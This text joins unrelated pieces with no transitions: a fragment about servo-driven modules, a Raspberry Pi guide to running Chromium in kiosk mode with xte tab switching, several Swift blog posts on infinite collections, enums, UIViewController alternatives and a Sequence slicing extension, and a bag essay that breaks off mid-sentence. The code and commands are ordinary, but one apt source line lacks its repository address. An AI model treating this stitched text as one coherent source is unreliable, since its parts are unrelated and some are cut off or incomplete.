Indeed, there are many advantages to adopting these devices: reduced size, low power consumption, good kg/cm rotational force (thanks to the geared engine) and good positioning precision. For our solution we don't need a strong force, but the movement should be fluid and a bit faster than the maximum rotation speed of the motor shaft allows directly. This is the reason the camshaft-like lever multiplies the speed a bit in the conversion.

Look at the images above. The rendered matrix simulation of some rows of modules shows how the motor wires can be connected to their respective motor controllers. The controllers and the PSoC 4200 array can easily fit on one side of the assembled platform. The modular matrix can be replicated in multiple units connected together without difficulty. Now we are ready to make the first prototype and see it in reality!

In order to be able to visualise the home control interface on the touch screen, a browser is required. The resolution of the touch screen is limited to 800x480, so every pixel counts. By putting the browser in full screen mode and hiding all the navigation bars, maximum space is made available. This is often referred to as "kiosk mode". Rick has already demonstrated how to put the stock browser "Epiphany" in kiosk mode. In order to try something different and be able to compare with Rick's solution, I decided to use the Chromium browser instead. Chromium is not available in the default repositories, but according to this thread, Chromium can be sourced from the Ubuntu repositories in order to install it on Raspbian Jessie.
First, add the new source:

pi@piiot1:~ $ sudo nano /etc/apt/sources.list.d/chromium-ppa.list
deb vivid main

Apply the key to verify the downloaded packages:

pi@piiot1:~ $ sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys DB69B232436DAC4B50BDC59E4E1B983C5B393194

Update your package list and install Chromium:

pi@piiot1:~ $ sudo apt-get update
pi@piiot1:~ $ sudo apt install chromium-browser

Test the installation by launching the browser. I tried it via SSH and got the following error:

pi@piiot1:~ $ chromium-browser
[16670:16670:0818/222510:ERROR:browser_main_loop.cc(271)] Gtk: cannot open display:

To solve this issue, specify which display to use the browser with (the touch screen):

pi@piiot1:~ $ chromium-browser --display=:0

Tadaaa! Chromium is installed and running on the Raspberry Pi.

With Chromium installed and executable, let's take a look at some interesting switches. Switches are command line parameters that can be passed when launching Chromium, altering its behaviour and/or appearance. For my application, these seemed like the most relevant switches: Launching the full command can then be done as follows:

pi@piiot1:~ $ chromium-browser --display=:0 --kiosk --noerrdialogs --disable-pinch --overscroll-history-navigation=0

At startup, the Chromium browser is started with different tabs. These tabs are not visible due to the kiosk mode though (and can't accidentally be closed either). In order to navigate between these tabs and refresh their content, we need to know how to simulate the correct keypresses, triggering the tab switching. This is done as follows:

pi@piiot1:~ $ xte "keydown Control_L" "key 3" -x:0 && xte "key F5" -x:0

What this does is switch tabs by simulating the "CTRL + <TAB_ID>" combination, optionally followed by an "F5" refreshing the selected tab. In order to implement this tab switching functionality, I'm using the 4x4 button matrix called Trellis, which I introduced in my previous post.
It connects to the I2C pins and requires two software libraries to be installed. On the hardware side, nothing fancy: connect the Trellis to the I2C pins and power it via the 5V pin:
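The pieces above can be tied together with a small helper that maps a Trellis button number to the xte commands for the matching tab. This is only a sketch of the glue logic: the button-to-tab mapping and the function names are my own, actually sending the keys requires xte and a running X session on :0, and I also release the Control key with a keyup, which the one-liner above leaves held down:

```python
import subprocess

def xte_args(tab_number, refresh=True):
    """Build the xte invocations that select Chromium tab `tab_number`
    on display :0 and optionally refresh it with F5."""
    commands = [["xte", "keydown Control_L", "key %d" % tab_number,
                 "keyup Control_L", "-x:0"]]
    if refresh:
        commands.append(["xte", "key F5", "-x:0"])
    return commands

def on_button_pressed(button):
    """Hypothetical Trellis callback: buttons 0..3 select tabs 1..4."""
    for cmd in xte_args(button + 1):
        subprocess.call(cmd)  # needs xte installed and an X session on :0

print(xte_args(2)[0])
```

Keeping the command construction separate from the subprocess call makes the mapping easy to test without a display attached.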
There’s quite a bit of conversation on Swift Evolution about the potential future of Sequence and Collection hierarchy. There’s a number of problems that the community is trying to solve and a variety of approaches that have been presented to solve them. Several of these approaches include the ability to create infinite collections, and every time anyone brings this up, someone invariably asks how they would work. Nothing in the type system prevents us from making an infinite collection — it’s purely a semantic constraint — meaning that while we can write infinite collections in Swift today, we’re not supposed to. It violates the assumptions that other people’s code will make about our object. In this post, I’ll take an infinite sequence and demonstrate how we could turn it into an infinite collection. The Fibonacci numbers are a great example of an infinite sequence. For a quick refresher, each element in that sequence is the sum of the previous two numbers. Swift has pretty good facility for defining new sequences quickly. Two useful functions are sequence(state:next:) and sequence(first:next). Here, we’ll use the state version: let fib = sequence(state: (0, 1), next: { state -> Int? in let next = state.0 + state.1 state = (state.1, next) return next }) Calling fib.prefix(10) will give you the first 10 Fibonacci numbers. Note that this is an infinite sequence! If you try to map over this sequence (which the type system fully allows!), your program will just spin infinitely until it runs out of integers or the heat death of the universe, whichever comes first. To convert this into an infinite collection, we need to think about a few things. First, how will we represent an index to a value? For an array, this is a number that probably represents a memory offset. For a string, this might represents a byte offset that that character starts at. It needs to be some value that lets us retrieve the value at that index at constant time, or O(1). 
One of the interesting things about iterators is that their current state represents the data that you need to get to the next value in constant time. So any deterministic sequence can be represented as a collection, by using its iterator's state as an index. Our state before was (Int, Int), so we can start off by using that type for our Index. These are the four requirements we need to define a Collection:

struct FibonacciCollection: Collection {

    typealias Index = (Int, Int)

    var startIndex: Index {
        return (0, 1)
    }

    func index(after previous: Index) -> Index {
        return (previous.1, previous.0 + previous.1)
    }

    var endIndex: Index {
        fatalError("This collection has no endIndex, because it is infinite")
    }

    subscript(index: Index) -> Int {
        return index.0 + index.1
    }
}

We can use (Int, Int) (our state from the Fibonacci numbers when they were a sequence) as the index, and use (0, 1) as our starting value (just like our sequence). But there are a few problems with this approach. To iterate over an arbitrary collection, you can imagine constructing a big while loop:

var index = collection.startIndex
while index < collection.endIndex {
    let value = collection[index]
    // use `value` somehow
    index = collection.index(after: index)
}

(This isn't how we'd use our collection, since we know it's infinite, but this is how normal collections work.) Two things stand out. First, we need the Index type to be Comparable - so we can't use a tuple - and we need endIndex to be defined so that we can check against it - so we can't fatalError (ding!). So we need a new index type: something that's Comparable and something that's unreachable. The unreachable value should compute to being "greater" than all the reachable values (since it goes at the "end" of the collection). Our first attack is to model this as a struct of two integers, to solve the comparability problem:

struct FibIndex: Comparable {
    var first: Int
    var second: Int

    static func == (lhs: FibIndex, rhs: FibIndex) -> Bool {
        return lhs.first == rhs.first && lhs.second == rhs.second
    }

    static func < (lhs: FibIndex, rhs: FibIndex) -> Bool {
        return lhs.first < rhs.first
    }
}

This solves the comparability problem, but not the unreachability problem.
We need a way to represent one more value: a value that's separate from all the others. Let's start over, but with an enum this time:

enum FibIndex {
    case reachable(Int, Int)
    case unreachable
}

This could solve both of our problems. Unfortunately, it makes writing == and < pretty messy:

extension FibIndex: Comparable {

    static func == (lhs: FibIndex, rhs: FibIndex) -> Bool {
        switch (lhs, rhs) {
        case (.unreachable, .unreachable):
            return true
        case let (.reachable(l1, l2), .reachable(r1, r2)):
            return l1 == r1 && l2 == r2
        case (.reachable, .unreachable):
            return false
        case (.unreachable, .reachable):
            return false
        }
    }

    static func < (lhs: FibIndex, rhs: FibIndex) -> Bool {
        switch (lhs, rhs) {
        case (.unreachable, .unreachable):
            return false
        case let (.reachable(l1, l2), .reachable(r1, r2)):
            return l1 < r1
        case (.reachable, .unreachable):
            return true
        case (.unreachable, .reachable):
            return false
        }
    }
}

(There are some ways to clean this up with better pattern matching, but I'm going with the explicitness of the full patterns here.) Let's add some helpers:

extension FibIndex {

    var sum: Int {
        switch self {
        case .unreachable:
            fatalError("Can't get the sum at an unreachable index")
        case let .reachable(first, second):
            return first + second
        }
    }

    var next: FibIndex {
        switch self {
        case .unreachable:
            fatalError("Can't get the next value of an unreachable index")
        case let .reachable(first, second):
            return .reachable(second, first + second)
        }
    }
}

And now we can complete our FibonacciCollection:

struct FibonacciCollection: Collection {

    typealias Index = FibIndex

    var startIndex: Index {
        return .reachable(0, 1)
    }

    func index(after previous: Index) -> Index {
        return previous.next
    }

    var endIndex: Index {
        return .unreachable
    }

    subscript(index: Index) -> Int {
        return index.sum
    }
}

This is pretty good! We get all of the methods from the Sequence and Collection protocols for free.
Unfortunately, this is still an infinite collection, and just like the infinite sequence, we can't map over it, or we'll risk looping forever. There are new things on the Collection protocol that we also can't do - like getting the count of this collection. That will also spin forever.

There is one more tweak I'd like to show here, which is extracting the Fibonacci-specific parts of this and making a generic InfiniteCollectionIndex. To do this, we'd keep our basic enum's structure, but instead of the .reachable case having type (Int, Int), we'd need to put a generic placeholder there. How would that look? Let's call the inner index type WrappedIndex. We need to make sure that the wrapped index is Comparable:

enum InfiniteCollectionIndex<WrappedIndex: Comparable> {
    case reachable(WrappedIndex)
    case unreachable
}

The Equatable and Comparable implementations stay mostly the same, but instead of comparing integers, they just forward to WrappedIndex:

extension InfiniteCollectionIndex: Comparable {

    static func == (lhs: InfiniteCollectionIndex, rhs: InfiniteCollectionIndex) -> Bool {
        switch (lhs, rhs) {
        case (.unreachable, .unreachable):
            return true
        case let (.reachable(left), .reachable(right)):
            return left == right
        case (.reachable, .unreachable):
            return false
        case (.unreachable, .reachable):
            return false
        }
    }

    static func < (lhs: InfiniteCollectionIndex, rhs: InfiniteCollectionIndex) -> Bool {
        switch (lhs, rhs) {
        case (.unreachable, .unreachable):
            return false
        case let (.reachable(left), .reachable(right)):
            return left < right
        case (.reachable, .unreachable):
            return true
        case (.unreachable, .reachable):
            return false
        }
    }
}

And one more helper, because there will be a lot of situations where we want to assume that the .unreachable value is, well, unreachable:

extension InfiniteCollectionIndex {

    func assumingReachable<T>(_ block: (WrappedIndex) -> T) -> T {
        switch self {
        case .unreachable:
            fatalError("You can't operate on an unreachable index")
        case let .reachable(wrapped):
            return block(wrapped)
        }
    }

    func makeNextReachableIndex(_ block: (WrappedIndex) -> WrappedIndex) -> InfiniteCollectionIndex {
        return .reachable(assumingReachable(block))
    }
}

assumingReachable takes a block that assumes that the value is .reachable, and returns whatever that block returns. If the value is .unreachable, it crashes. We can now use the struct form of FibIndex from before:

struct FibIndex: Comparable {
    var first: Int
    var second: Int

    static func < (lhs: FibIndex, rhs: FibIndex) -> Bool {
        return lhs.first < rhs.first
    }
}

I won't go into too much of the detail here, but this allows us to define simple Comparable index types, and make them into infinite indexes easily:

struct FibonacciCollection: Collection {

    typealias Index = InfiniteCollectionIndex<FibIndex>

    var startIndex: Index {
        return .reachable(FibIndex(first: 0, second: 1))
    }

    func index(after previous: Index) -> Index {
        return previous.makeNextReachableIndex({
            FibIndex(first: $0.second, second: $0.first + $0.second)
        })
    }

    var endIndex: Index {
        return .unreachable
    }

    subscript(index: Index) -> Int {
        return index.assumingReachable({ $0.first + $0.second })
    }
}

It's not clear which way the tides will ultimately shift with Swift's Collection model, but if and when infinite collections become legal in Swift, this technique will help you define them easily. This article is also available in Chinese.

Last year I wrote a post about how adding simple optional properties to your classes is the easy thing to do when you want to extend functionality, but can actually subtly harm your codebase in the long run. This post is the spiritual successor to that one.

Let's say you're designing the auth flow in your app. You know this flow isn't going to be simple or linear, so you want to write some very testable code.
Your approach to this is to first think through all the screens in that flow and put them in an enum:

enum AuthFlowStep {
    case collectUsernameAndPassword
    case findFriends
    case uploadAvatar
}

Then you put all your complicated logic into a single function that takes the current step and the current state, and spits out the next step of the flow:

func stepAfter(_ currentStep: AuthFlowStep, context: UserState) -> AuthFlowStep

This should be very easy to test. So far, so good. Except - you're working through the logic, and you realize that you won't always be able to return an AuthFlowStep. Once the user has submitted all the data they need to fully auth, you need something that will signal that the flow is over. You're working right there in the function, and you want to return a special case of the thing that you already have. What do you do? You change the return type to an optional:

func stepAfter(_ currentStep: AuthFlowStep, context: UserState) -> AuthFlowStep?

This solution works. You go to your coordinator, call this function, and start working with it:

func finished(flowStep: AuthFlowStep, state: UserState, from vc: SomeViewController) {
    let nextState = stepAfter(flowStep, context: state)

When we get nextState, it's optional, so the default move here is to guard it to a non-optional value.
guard let nextState = stepAfter(flowStep, context: state) else { self.parentCoordinator.authFlowFinished(on: self); return } switch nextState { case .collectUsernameAndPassword: //build and present next view controller This feels a bit weird, but I remember Olivier’s guide on pattern matching in Swift, and I remember that I can switch on the optional and my enum at the same time: func finished(flowStep: AuthFlowStep, state: UserState, from viewController: SomeViewController) { let nextState = stepAfter(flowStep, context: state) // Optional<AuthFlowStep> switch nextState { case nil: self.parentCoordinator.authFlowFinished(on: self) case .collectUsernameAndPassword?: //build and present next view controller That little question mark lets me match an optional case of an enum. It makes for better code, but something still isn’t sitting right. If I’m doing one big switch, why am I trying to unwrap a nested thing? What does nil mean in this context again? If you paid attention to the title of the post, perhaps you’ve already figured out where this is going. Let’s look at the definition of Optional. Under the hood, it’s just an enum, like AuthFlowStep: enum Optional<Wrapped> { case some(Wrapped) case none } When you slot an enum into the Optional type, you’re essentially just adding one more case to the Wrapped enum. But we have total control over our AuthFlowStep enum! We can change it and add our new case directly to it. enum AuthFlowStep { case collectUsernameAndPassword case findFriends case uploadAvatar case finished } We can now remove the ? from our function’s signature: func stepAfter(_ currentStep: AuthFlowStep, context: UserState) -> AuthFlowStep And our switch statement now switches directly over all the cases, with no special handling for the nil case. Why is this better? A few reasons: First, what was once nil is now named. Before, users of this function might not know exactly what it means when the function returns nil.
They either have to resort to reading documentation, or worse, reading the code of the function, to understand when nil might be returned. Second, simplicity is king. No need to have a guard then a switch, or a switch that digs through two layers of enums. One layer of thing, always easy to handle. Lastly, precision. Having return nil available as a bail-out at any point in a function can be a crutch. The next developer might find themselves in an exceptional situation where they’d like to jump out of the function, and so they drop a return nil. Except now, nil has two meanings, and you’re not handling one of them correctly. When you add your own special cases to enums, it’s also worth thinking about the name you’ll use. There are lots of names available, any of which might make sense in your context: .unknown, .none, .finished, .initial, .notFound, .default, .nothing, .unspecified, and so on. (One other thing to note is that if you have a .none case, and you do happen to make that value optional, then whether it will use Optional.none or YourEnum.none is ambiguous.) I’m using flow states as a general example here, but I think the pattern can be expanded to fit other situations as well — anytime you have an enum and want to wrap it in an optional, it’s worth thinking whether there’s another enum case hiding there, begging to be drawn out. Thanks to Bryan Irace for feedback and the example for this post. In Apple’s documentation, they suggest you use a pattern called MVC to structure your apps. However, the pattern they describe isn’t true MVC in the original sense of the term. I’ve touched on this point here before, but MVC was a design pattern created for Smalltalk. In Smalltalk’s formulation, each of the 3 components (model, view, and controller) talked directly to the others. This means that either the view knows how to apply a model to itself, or the model knows how to apply itself to a view.
When we write iOS apps, we consider models and views that talk directly to each other as an anti-pattern. What we call MVC is more accurately described as model-view-adapter. Our “view controllers” (the “adapters”) sit in between the model and view and mediate their interactions. In general, I think this is a good modification to MVC — the model and view not being directly coupled together and instead connected via an intermediary seems like a positive step. However, I will caveat this by saying that I haven’t worked with many systems that don’t maintain this separation. So, that’s why we have view controllers in iOS. They serve to glue the model and view together. Now, there are downstream problems with this style of coding: code that doesn’t obviously belong in models or views ends up in the view controller, and you end up with gigantic view controllers. I’ve discussed that particular problem on this blog many times, but it’s not exactly what I want to talk about today. I’ve heard whispers through the grapevine of what’s going on under the hood with UIViewController. I think the longer you’ve been working with UIKit, the more obvious this is, but the UIViewController base class is not pretty. I’ve heard that, in terms of lines of code, it’s on the higher end of 10,000 to 20,000 lines (and this was a few years ago, so they’ve maybe broken past the 20 kloc mark at this point). When you want the benefits of an object to glue a UIView and a model object (or collection thereof) together, typically, we use view controller containment to break the view controller up into smaller pieces, and compose them back together. However, containment can be finicky. It subtly breaks things if you don’t do it right, with no indication of how to fix any issues. Then, when you finally do see your bug, which was probably a misordering of calls to didMove or willMove or whatever, everything magically starts working. 
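For reference, the containment dance the paragraph above alludes to looks like this. This is a sketch using the modern addChild/didMove(toParent:) spellings; the helper function names are my own invention:

```swift
import UIKit

// Adding a child: the order matters.
func embed(_ child: UIViewController, in parent: UIViewController) {
    parent.addChild(child)                 // 1. register the child first
    parent.view.addSubview(child.view)     // 2. then install its view
    child.view.frame = parent.view.bounds
    child.didMove(toParent: parent)        // 3. then tell it the move is complete
}

// Removing a child mirrors the sequence, with willMove called first.
func unembed(_ child: UIViewController) {
    child.willMove(toParent: nil)          // 1. announce the departure
    child.view.removeFromSuperview()       // 2. remove the view
    child.removeFromParent()               // 3. finally detach the controller
}
```

Get any of those steps out of order and you get the subtle breakage described above, which is exactly the point: the sequence exists to maintain state you can't see.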
In fact, the very presence of willMove and didMove suggests that containment has some invisible internal state that needs to be cleaned up. I’ve seen this firsthand in two particular situations. First, I’ve seen this issue pop up with putting view controllers in cells. When I first did this, I had a bug in the app where some content in the table view would randomly disappear. This bug went on for months, until I realized I misunderstood the lifecycle of table view cells, and I wasn’t correctly respecting containment. Once I added the correct -addChildViewController calls, everything started working great. To me, this showed a big thing: a view controller’s view isn’t just a dumb view. It knows that it’s not just a regular view, but that it’s a view controller’s view, and its qualities change in order to accommodate that. In retrospect, it should have been obvious. How does UIViewController know when to call -viewDidLayoutSubviews? The view must be telling it, which means the view has some knowledge of the view controller. The second case where I’ve more recently run into this is trying to use a view controller’s view as a text field’s inputAccessoryView. Getting this behavior to play nicely with the behavior from messaging apps (like iMessage) of having the textField stick to the bottom was very frustrating. I spent over a day trying to get this to work, with minimal success to show for it. I ended up reverting to a plain view. I think at a point like that, when you’ve spent over a day wrestling with UIKit, it’s time to ask: is it really worth it to subclass from UIViewController here? Do you really need 20,000 lines of dead weight to make an object that binds a view and a model? Do you really need viewWillAppear and rotation callbacks that badly? So, what does UIViewController do that we always want? - Hold a view. - Bind a model to a view. What does it do that we usually don’t care about? - Provide storage for child view controllers.
- Forward appearance (-viewWillAppear:, etc.) and transition coordination to children. - Can be presented in container view controllers like UINavigationController. - Notify on low memory. - Handle status bars. - Preserve and restore state. So, with this knowledge, we now know what to build in order to replace view controllers for the strange edge cases where we don’t necessarily want all their baggage. I like this pattern because it tickles my “just build it yourself” bone and solves real problems quickly, at the exact same time. There is one open question, which is what to name it. I don’t think it should be named a view controller, because it might be easy to confuse for a UIViewController subclass. We could just call it a regular Controller? I don’t hate this solution (despite any writings in the past) because it serves the same purpose as a controller in iOS’s MVC (bind a view and model together), but there are other options as well: Binder, Binding, Pair, Mediator, Concierge. The other nice thing about this pattern is how easy it is to build. class DestinationTextFieldController { var destination: Destination? weak var delegate: DestinationTextFieldControllerDelegate? let textField = UITextField().configure({ $0.autocorrectionType = .no $0.clearButtonMode = .always }) } It almost seems like heresy to create an object like this and not subclass UIViewController, but when UIViewController isn’t pulling its weight, it’s gotta go. You already know how to add functionality to your new object. In this case, the controller ends up being the delegate of the textField, emitting events (and domain metadata) when the text changes, and providing hooks into updating its view (the textField in this case).
extension DestinationTextFieldController { var isActive: Bool { return self.textField.isFirstResponder } func update(with destination: Destination) { self.destination = destination configureView() } private func configureView() { textField.text = destination?.descriptionForDisplay } } There are a few new things you’re responsible for with this new type of controller: - you have to make an instance variable to store it - you’re responsible for triggering events on it — because it’s not a real view controller, there’s no more -viewDidAppear: - you’re not in UIKit anymore, so you can’t directly rely on things like trait collections or safe area insets or the responder chain — you have to pass those things to your controller explicitly Using this new object isn’t too hard, even though you do have to explicitly store it so it doesn’t deallocate: class MyViewController: UIViewController, DestinationTextFieldControllerDelegate { let destinationViewController = DestinationTextFieldController() override func viewDidLoad() { super.viewDidLoad() destinationViewController.delegate = self view.addSubview(destinationViewController.textField) } //handle any delegate methods } Even if you use this pattern, most of your view controllers will still be view controllers and subclass from UIViewController. However, in those special cases where integrating a view controller causes you hours and hours of pain, this can be a perfect way to simply opt out of the torment that UIKit brings to your life daily. If you want some extreme bikeshedding on a very simple topic, this is the post for you. For the folks who have been at any of the recent conferences I’ve presented at, you’ve probably seen my talk, You Deserve Nice Things. The talk is about Apple’s reticence to provide conveniences for its various libraries. It draws a lot on an old post of mine, Categorical, as well as bringing in a lot of new Swift stuff. One part of the standard library that’s eminently extendable is Sequence and friends.
Because of the number of different operations we want to perform on these types, even with the large number of affordances that the standard library does provide (standard stuff like map and filter, as well as more abstruse stuff like partition(by:) and lexicographicallyPrecedes), it still doesn’t cover the breadth of operations that are useful in our day-to-day programming life. In the talk, I propose a few extensions that I think are useful, including any, all, none, and count(where:), eachPair, chunking, and a few others. None of these ideas are original to me. They’re ideas lifted wholesale from other languages, primarily Ruby and its Enumerable module. Enumerable is a useful case study because anything that’s even marginally useful gets added to this module, and Ruby developers reap the benefits. Swift’s standard library is a bit more conservative, but its ability to extend types and specifically protocols makes the point mostly moot. You can bring your own methods as needed. (In Categorical, I make the case that this is the responsibility of the vendor, but until they’re willing to step up, we’re on our own.) I have an app where I need to break up a gallery of images into groups based on date. The groups could be based on individual days, but we thought grouping into “sessions” would be better. Each session is defined by starting more than an hour after the last session ended. More simply, if there’s a gap between two photos of more than an hour, that should signal the start of a new session. Since we’re splitting a Sequence, the first thought is to use something built in: there’s a function called split, which takes a bunch of parameters (maxSplits, omittingEmptySubsequences, and a block called isSeparator to determine if an element defines a split). However, we can already see from the type signature that this function isn’t quite going to do what we want.
The isSeparator function yields only one element, which makes it hard to tell if there should be a split between two consecutive elements, which is what we’re actually trying to do. In point of fact, this function consumes the separators, because it’s a more generic version of the String function split, which is useful in its own right. No, we need something different. In her post, Erica Sadun has some answers for us: she’s got a function that works sort of like what we want. In this case, the block takes the current element and the current partition, and you can determine if the current element fits in the current partition. extension Sequence { public func partitioned(at predicate: (_ element: Iterator.Element, _ currentPartition: [Iterator.Element]) -> Bool ) -> [[Iterator.Element]] { var current: [Iterator.Element] = [] var results: [[Iterator.Element]] = [] for element in self { guard !current.isEmpty else { current = [element]; continue } switch predicate(element, current) { case true: results.append(current); current = [element] case false: current.append(element) } } guard !current.isEmpty else { return results } results.append(current) return results } } I’ve got a few small gripes with this function as implemented: The name. Partitioning in the standard library currently refers to changing the order of a MutableCollection and returning a pivot where the collection switches from one partition to another. I wouldn’t mind calling it something with split in the name, but as mentioned before, that usually consumes the elements. I think calling this slicing is the best thing to do. Slicing is also a concept that already exists in the standard library (taking a small part of an existing Collection) but in a lot of ways, that’s actually what we’re doing in this case. We’re just generating more than one slice. The name again. Specifically, the at in partition(at:) doesn’t seem exactly right.
Since we’re not consuming elements anymore, the new partition has to happen either before the given element, or after it. The function’s name doesn’t tell us which. If we change the signature of the function to return a consecutive pair of elements, we can change its name to slice(between:). This has the added benefit of no longer requiring a force unwrap in usage. Erica’s whole problem with this code is that passing back a collection that is known to be non-empty (*COUGH*) means that she has to force unwrap access to the last element: testArray.partitioned(at: { $0 != $1.last! }) If we change the function to slice(between:), we can simplify this way down, to: testArray.slice(between: !=) Way nicer. Now that we’ve beaten the name into the ground, let’s move on to discussion about the implementation. Specifically, there is some duplication in the code that I find problematic. Two expressions in particular: First, current = [element] Second, results.append(current) This code may not look like much — only a few characters, you protest! — but it represents a duplication in concept. If these expressions needed to expand to do more, they’d have to be expanded in two places. This was excruciatingly highlighted when porting this code over to my gallery app (which is Objective-C): I wanted to wrap the image collections in a class called a PhotoSection. Creating the PhotoSection in two places made it painfully obvious that this algorithm duplicates code. This code is ugly and frustrating: the important part of the code, the actual logic of what’s happening, is tucked away in the middle there. [photosForCurrentSection.lastObject.date timeIntervalSinceDate:photo.date] > 60*60 The entire rest of the code could be abstracted away. Part of this is Objective-C’s fault, but this version of the code really does highlight the duplication that happens when modifying the code that creates a new section. The last piece of the puzzle here is how Ruby’s Enumerable comes into play.
When exploring that module, you can see three functions that look like they could be related: slice_when, slice_before, and slice_after. What is the relationship between these functions? It seems obvious now that I know, but I did have to do some searching around for blog posts to explain it. Essentially, slice_when is like our slice(between:). It gives you two elements and you tell it if there should be a division there. slice(before:) and slice(after:) each yield only one element in their block, and slice before or after that element. This clears up the confusion with Erica’s original function — we now know if it’ll slice before or after our element, based on the name of the function. As for implementation, you could use a for loop and the slight duplication of Erica’s code, but I’ve recently been trying to express more code in terms of chains of functions that express a whole operation that happens to the collection all at once. I find this kind of code more elegant, easier to read, and less prone to error, even though it does pass over the relevant collection multiple times. To write our slice(between:) function in that style, we first need two helpers: extension Collection { func eachPair() -> Zip2Sequence<Self, Self.SubSequence> { return zip(self, self.dropFirst()) } func indexed() -> [(index: Index, element: Element)] { return zip(indices, self).map({ (index: $0, element: $1) }) } } I’m a big fan of composing these operations together, from smaller, simpler concepts into bigger, more complex ones. There are slightly more performant ways to write both of those functions, but these simple implementations will do for now. 
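To make the behavior of these two helpers concrete, here's a quick standalone check (the extension is restated so the snippet runs on its own):

```swift
extension Collection {
    // Pairs each element with its successor: [1, 2, 3, 4] -> (1, 2), (2, 3), (3, 4)
    func eachPair() -> Zip2Sequence<Self, Self.SubSequence> {
        return zip(self, self.dropFirst())
    }

    // Pairs each element with its index.
    func indexed() -> [(index: Index, element: Element)] {
        return zip(indices, self).map({ (index: $0, element: $1) })
    }
}

let pairs = [1, 2, 3, 4].eachPair().map({ [$0, $1] })
// pairs == [[1, 2], [2, 3], [3, 4]]

let indexed = ["a", "b"].indexed()
// indexed == [(index: 0, element: "a"), (index: 1, element: "b")]
```

Note that eachPair produces one fewer element than the collection it came from, and produces nothing at all for empty or single-element collections — exactly the behavior we want when asking "should there be a split between these two?"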
extension Collection { func slice(between predicate: (Element, Element) -> Bool) -> [SubSequence] { let innerSlicingPoints = self .indexed() .eachPair() .map({ (indexAfter: $0.1.index, shouldSlice: predicate($0.0.element, $0.1.element)) }) .filter({ $0.shouldSlice }) .map({ $0.indexAfter }) let slicingPoints = [self.startIndex] + innerSlicingPoints + [self.endIndex] return slicingPoints .eachPair() .map({ self[$0..<$1] }) } } This function is broken up into 3 main sections: - Find the indexes after any point where the caller wants to divide the sequence. - Add the startIndex and the endIndex. - Create slices for each consecutive pair of those indexes. Again, this isn’t the most performant implementation. Namely, it does quite a few iterations, and requires Collection where Erica’s solution required just a Sequence. But I do think it’s easier to read and understand. As I discussed in the post about refactoring, distilling an algorithm into straightforward, simple forms, operating at the highest possible level of abstraction, enables you to see the structure of the algorithm and potential transforms that it can undergo to create other algorithms. Erica’s original example is a lot simpler now: let groups = [1, 1, 2, 3, 3, 2, 3, 3, 4].slice(between: !=) To close this post out, the implementations for slice(before:) and slice(after:) practically fall out of the ether, now that we have slice(between:): extension Collection { func slice(before predicate: (Element) -> Bool) -> [SubSequence] { return self.slice(between: { left, right in return predicate(right) }) } func slice(after predicate: (Element) -> Bool) -> [SubSequence] { return self.slice(between: { left, right in return predicate(left) }) } } This enables weird things to become easy, like splitting a CamelCased type name: let components = "GalleryDataSource" .slice(before: { ("A"..."Z").contains($0) }) .map({ String($0) }) (Don’t try it with a type name with an initialism in it, like URLSession.)
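Pulling the pieces together, the gallery motivation from earlier in the post can now be expressed directly. Here's a self-contained version, with timestamps simplified to plain integer minutes rather than the app's real date objects:

```swift
extension Collection {
    func eachPair() -> Zip2Sequence<Self, Self.SubSequence> {
        return zip(self, self.dropFirst())
    }

    func indexed() -> [(index: Index, element: Element)] {
        return zip(indices, self).map({ (index: $0, element: $1) })
    }

    func slice(between predicate: (Element, Element) -> Bool) -> [SubSequence] {
        // Indexes after any point where the caller wants to divide the sequence.
        let innerSlicingPoints = self
            .indexed()
            .eachPair()
            .map({ (indexAfter: $0.1.index, shouldSlice: predicate($0.0.element, $0.1.element)) })
            .filter({ $0.shouldSlice })
            .map({ $0.indexAfter })
        // Bookend with startIndex and endIndex, then slice each consecutive pair.
        let slicingPoints = [self.startIndex] + innerSlicingPoints + [self.endIndex]
        return slicingPoints
            .eachPair()
            .map({ self[$0..<$1] })
    }
}

// Photo timestamps in minutes; a gap of more than 60 minutes starts a new "session".
let timestamps = [0, 10, 200, 215, 400]
let sessions = timestamps.slice(between: { $1 - $0 > 60 }).map({ Array($0) })
// sessions == [[0, 10], [200, 215], [400]]
```

The predicate reads exactly like the problem statement — "is the gap between these two photos more than an hour?" — and everything else is reusable machinery.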
A few months ago, Alex Cox put out a call on Twitter asking for someone to help her find a backpack that would suit her needs. She’d tried a bunch, and found all of them lacking. I have a small obsession with bags, suitcases, and backpacks. For probably 15 years now, I’ve been hunting for “the perfect bag”. Along this journey, I’ve attained bag enlightenment, and I’m here to impart that knowledge to you today. Here’s the deal. You won’t find a perfect bag. This is for one simple reason: the perfect bag doesn’t exist. I know this because, at the time of writing, I own 4 rolling suitcases, 3 messenger bags, 3 daily carry backpacks, 2 travel backpacks, and 3 duffel bags/weekenders. They’re all stuffed inside each other, stacked in a small closet in my apartment, my Russian nesting travel bags. And every last one is a compromise in some way or another. These compromises are very apparent if you troll Kickstarter for travel backpacks. You’ll find tons: the Minaal, NOMATIC, PAKT One, Brevitē, Hexad, Allpa, RuitBag, Numi, and the aptly named DoucheBags. Their videos all start exactly the same: “We looked at every bag on the market, and found them lacking. We then spent 2 years designing our bag and sourcing the highest quality zippers, and we’re finally ready to start producing this bag.” They then go through the 5 features that they think make their bag different from the rest, talk about a manufacturer they’ve found, and then they hit you with the “and that’s where you come in” and ask you for money. Once you watch the first of these videos, the argument is somewhat compelling. Wow, they’ve really figured it out! But once you’ve seen five of them, you know there must be something else going on. How could all these different bag startups claim that each other’s products are clearly inferior and that only they have discovered the secret to bag excellence? To understand what makes bags so unsatisfying, it helps to borrow an idea Joel Spolsky has written about: every user needs a different subset of a product’s features, so no single design can satisfy everyone at once. It’s the same with bags.
You need a big bag so that it can fit all your stuff, but you need a small bag to avoid hitting people on public transit. You need a bag with wheels so you can roll it through the airport, but you need a bag with backpack straps so that you can get over rougher terrain with it. You need a bag that’s soft so you can squish it into places, but you need a bag that’s hard so that it can protect what’s inside. These competing requirements can’t be simultaneously satisfied. You have to choose one or the other. You can’t have it both ways. In Buddhism, they say “there is no path, there are only paths.” It’s the same with bags. Once you accept that all bags are some form of compromise, you can get a few different bags and use the right one for the right trip. Sometimes I want to look nice and need to carry a laptop: leather messenger bag. Sometimes I want to have lots of space and flexibility even if I look kind of dorky: my high school backpack. Sometimes I have a bunch of camera gear and I’m going to be gone for 3 weeks: checked rolling suitcase. Picking the right bag for the trip lets me graduate from “man, I wish I’d brought a bigger bag” to “bringing a bigger bag would have been great, but then I wouldn’t have been able to jump on this scooter to the airport”. Less regret, more acceptance. It’s worth thinking about how you like to travel, what types of trips you take, what qualities you value having in your bags, and getting a few 